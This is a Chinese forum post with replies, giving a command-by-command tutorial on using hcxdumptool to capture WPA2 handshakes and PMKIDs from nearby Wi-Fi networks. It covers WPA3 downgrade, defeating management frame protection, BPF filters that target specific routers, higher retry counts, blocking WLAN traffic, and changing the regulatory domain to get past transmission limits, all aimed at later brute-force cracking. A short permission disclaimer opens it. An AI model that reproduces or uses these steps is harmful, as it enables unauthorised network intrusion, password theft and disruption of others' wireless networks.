上上网 发表于 2024-1-17 15:49

攻击WPA3降级从而捕获为WP2握手包

本帖最后由 上上网 于 2024-2-18 17:02 编辑

声明:使用此工具前,你必须有攻击网络的权限, 执行持久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。

那些 水滴 奶瓶 CDLINUX 等 淘汰工具随着时代进化, 一些功能已经跟不上了

一种具有降级攻击主动交互式工具。与使用传统Deauth帧注入不同,在捕获过程中,它具有主动发送请求交互功能,确保PSK能被恢复,
如果你捕获握手包非常困难情况, 可以偿试使用, 可能会有怀孕惊喜哦

亮点1:对 一些wifi6 具有WPA3协议的实施降级攻击,捕获的为WPA2握手包,从而仍然可以使用暴力方式破解

亮点2:对一些路由器具有管理帧保护(MFP)的攻击有效,使用其他一些传统Deauth帧注入工具不能捕获这类路由器
,
亮点3:能够从接入点捕获 PMKID

亮点4:可以看到捕获消息, 从而可以知道是否捕获了有效握手包

亮点5:可以实现包含GPS定位等数据信息,(海拨,经度,纬度 等等)

亮点6:具有漫游密钥过度管理功能路由器协议(FT PSK不支持破解),捕获为WPA2握手

亮点7:能够在2.4GHz上捕获5/6GHz客户端的握手

亮点8:能够捕获来自未连接客户端的握手

亮点9:能够从 WLAN 流量中捕获密码

亮点10:能够阻止完整的 WLAN 流量传输

亮点11:使用随机化MAC地址

亮点12:支持大多数主流用于破解网卡

在初始使用它前,   如果想少走弯路, 都应该继续阅读下去 ..   .
由于本篇内容涉及到BPF过滤波器使用, 需要一些802.x1基本知识, 例如需了解 addr1 addr2 addr3

如何在kali使用?就kali2023-4 为例吧   wifislax64-3.4-final也行
工具hcxdumptool 6.3.2
下载安装最新
依次执行以下命令安装
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool-master
sudo make && sudo make install

有下不了的情况,下载这个文件放进 KALI 或wifislax64-3.4-final 系统里面任何位置,然后执行上面命令安装也行



停止接口的服务 (如果需要)
停止
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
开启 (如果需要)
sudo systemctl start NetworkManager

查看国家无线监管域信息
iw reg get

注意: 无线监管域设置是极其重要, 某些监管域信道被限制不允许传输某些数据,所以它决定了捕获握手是否成功. 失败的重要因素,如检测到雷达,将不会传输
如果检测到国家域代码为00:DFS-UNSET和监管域:00,       可能会在5GHz和部分2.4GHz 信道上可能无法按预期工作, (会无法捕获在某些被限制频段握手)
抓不了就偿试变换到不同监管域码再进行捕获: 例如: IN(受限极小)   或其他受限制极小国家
执行设置监管域码例如: IN
sudo iw reg set IN
这不是持久化步骤,需要持久化必须在配置文件中取消对域注释

通过改变监管域码看到网卡发生了巨大变化, 可以看到下图中完全没有限制在某些频段中传输数据

以上仅是无线监管域部分小知识 , 也是数据是否可以顺利传输最重要一环节


接下来.
查看一下你要使用网卡接口编号是否对应, 通常接口是默认 wlan0
sudo hcxdumptool -l       或   sudo hcxdumptool -L
查看对应网卡信息命令sudo hcxdumptool -I wlan0

开始执行捕获命令所有信号握手, ( 如果网卡接口编号是 wlan0 )
sudo hcxdumptool -i wlan0-F --rds=1
从2.4ghz到5ghz历遍一次攻击周期约1-2分钟 ,-i wlan0网卡接口位,   -F 使用网卡支持所有频段,--rds=1 排序,文件名称会自动默认使用日期时间命名,如要指定文件名加参数-w SSID.pcapng可用SSID 或MAC DCAEFB命名
如果信号较差,又必需要捕获到有效握手,增大重新攻击重试,默认值是:    attemptapmax=4    attemptclientmax=10   
sudo hcxdumptool -i wlan0-F --rds=1--attemptclientmax=100 --attemptapmax=100
此时弹出窗口会显示是否捕获到握手详细数据信息示例, 看下图解析





如果要攻击单个路由器
1 > 扫描,   分普通模式 --rcascan=p及主动模式 --rcascan=a如果网卡支持主动监控, 主动模式扫描会有信标响应,可按探测响应计数排序--rds=1
扫描网卡支持2.4Ghz+5Ghz所有信道参数 -F    如不加参数-F 只扫描1, 6, 11信道
sudo hcxdumptool-i wlan0-F--rcascan=a--rds=1

或仅扫描指定2.Ghz信道,不扫描5Ghz信道不用加参数-F注意对应信道频带: 2.4g信道要加a
sudo hcxdumptool -i wlan0--rds=1 --rcascan=a -c 1a,2a,3a,4a,5a,6a,7a,8a,9a,10a,11a,12a,13a,14a

2 > 设置要指定网卡编号为监控模式(如果有插入多块网卡,要对应你自己网卡接口位 -i wlan0),如果创建BPF过滤器失败, 需要执行一下这命令
sudo hcxdumptool -m wlan0

3 > 创建BPF过滤器,攻击单个目标MAC:    00:00:00:00:00:00, 按实际自己要攻击MAC地址填写为准, 这只是示例 !
创建BPF命令
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00-ddd>g.bpf

或添加无向探测获取更多信息,   或有助于密码破解加这固定MAC:    ff:ff:ff:ff:ff:ff
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 ff:ff:ff:ff:ff:ff -ddd>g.bpf

如果要攻击2个目标路由器MAC
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 99:bb:99:bb:bb:99or wlan addr3 ff:ff:ff:ff:ff:ff -ddd>g.bpf

4 > 然后使用伯克利BPF过滤器,执行捕获单个或多个MAC握手命令
sudo hcxdumptool -i wlan0-F --bpf=g.bpf

有经验用户如要使用对应信道参数-c,    如11165信道 -c 11a,165b指定信道情况下不需加-F参数,更准确地攻击,以减少网卡活动周期优化时间
注意对应信道频带: 2.4g信道要加a5g信道要加b6g信道要加c是必须,   因为WiFi5,6不是唯一信道 。
执行命令
sudo hcxdumptool -i wlan0-c 11a,165b--bpf=g.bpf

如果要保护自己MAC路由器,需要创建自己路由器MAC保护
sudo tcpdump -i wlan0 not wlan addr2 cc:cc:cc:cc:cc:cc -ddd >p.bpf
然后执行保护自己,   捕获除自己外所有在范围内握手包
sudo hcxdumptool -i wlan0-F --rds=1--bpf=p.bpf



补充捕获5Ghz信号步骤
捕获在你5Ghz网卡支持频段范围内所有信号握手, 由于5Ghz网卡信道活动周期较长, 需较多时间
sudo hcxdumptool -i wlan0 -F--rds=1

如果要攻击5Ghz单个路由器信号
扫描:分普通模式--rcascan=p及主动模式--rcascan=a    如果网卡支持主动监控, 主动模式扫描时会有信标响应, 按探测响应计数排序--rds=1
扫描网卡支持所有信道参数 -F
sudo hcxdumptool-i wlan0-F--rcascan=a--rds=1

或扫描指定5Ghz以上信道,5g信道要加b6g信道加c
sudo hcxdumptool -i wlan0--rds=1--rcascan=a -c 36b,38b,40b,42b,44b,46b,48b,50b,52b,54b,56b,58b,60b,62b,64b,100b,102b,104b,106b,108b,100b,112b,114b,116b,118b,120b,122b,124b,126b,128b,130b,132b,134b,136b,138b,140b,149b,151b,153b,155b,157b,159b,161b,163b,165b,167b,169b,171b,173b,175b,177b,179b

创建要攻击5Ghz MAC:    00:00:00:00:00:00,按自己要攻击5Ghz MAC地址填写为准, 这只是示例 !
创建BPF, 可同时监听捕获2.4Ghz和5Ghz握手信号, 只需将路由器2个MAC创建加入BPF过滤器即可, 当攻击掉线时, 无论客户端连接上那个信号都能捕获到它们
创建1个要攻击MAC进BPF过滤器
sudo tcpdump -i wlan0 wlan addr3 000000000003-ddd>g.bpf

或创建2.4Ghz和5Ghz路由器MAC进过滤器 2.4Ghz MAC:    00:00:00:00:00:00      5Ghz MAC:    00:00:00:00:00:02
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 00:00:00:00:00:02 -ddd>g.bpf
执行命令
sudo hcxdumptool -i wlan0 -F--bpf=g.bpf

或指定对应信道参数攻击更准确,   如11165信道       -c 11a,165b以减少网卡活动周期优化时间
注意对应信道频带: 2.4g信道加a5g信道加b6g信道加c是必须,   因为WiFi5,6不是唯一信道 。
然后执行命令
sudo hcxdumptool -i wlan0-c 11a,165b--bpf=g.bpf


最后等待一下就可捕获到握手包了,如果在2分钟内捕获不了握手情况(信号好的一般在30秒内即可捕获握手,), 此时就应重新检查MAC是否与信号对应,   或停止后再次重新执行捕获命令,或检查无线监管域, 硬件, 网卡, 驱动, 系统 等等,或需要重新插拨USB接口网卡重试,有可能这原因导致的, 特别是在会被无线监管域限制的频段内导致传输失败
不推荐在虚拟机系统使用该工具,有可能因为虚拟接口产生较多问题,推荐物理硬盘启动, 如U盘启动Kali 内核>6.5wifislax64 等
捕获文件默认在Home文件夹下 !文件名称是以日期时间命名,    文件格式是pcapng固定格式


以下是旧版< 低于hcxdumptool 6.2.8 一些简单捕获握手命令
1> 扫描
sudo hcxdumptool -i wlan0 --do_rcascan

2> 将网卡设置为监控模式
sudo hcxdumptool -m wlan0

3> 捕获在范围内所有信号握手包
sudo hcxdumptool -iwlan0-o TP.pcapng --enable_status=15

如写的有不当之处或错误,请遵循各个版本的hcxdumptool -help为准




补充内容 (2024-5-28 11:23):
自 hcxdumptool6.3.2 之后起版本, 需要安装libpcap依赖
执行以下命令
sudo apt-get update
sudo apt install -y libpcap-dev

anhuzm 发表于 2024-1-19 16:13

感谢大佬的分享

马上成功 发表于 2024-1-17 21:20

抓到包子是不是 .22000 格式的?

anhuzm 发表于 2024-1-17 19:58

感谢大佬的无私分享哈

zhvsoy 发表于 2024-1-17 17:16

不明觉厉:D

lucy695586 发表于 2024-1-17 18:10

nice; Learning; thank you for sharing

上上网 发表于 2024-1-18 10:44

马上成功 发表于 2024-1-17 21:20
抓到包子是不是 .22000 格式的?

pcapng

马上成功 发表于 2024-1-18 17:42

不知道咋回事,打不开github的网站了,难道要富强

QQ157466502 发表于 2024-1-19 23:56

学习学习

QQ157466502 发表于 2024-1-20 00:14

访问不了网址

wxyao 发表于 2024-1-20 05:42

学习学习

上上网 发表于 2024-1-20 10:37

本帖最后由 上上网 于 2024-1-20 10:39 编辑

将文件下来放在上面了,下不了的可以下题中那个文件放进kali 或wifislax 中去,cd进目录后执行安装命令就行
页: [1] 2 3 4 5 6
查看完整版本: 攻击WPA3降级从而捕获为WP2握手包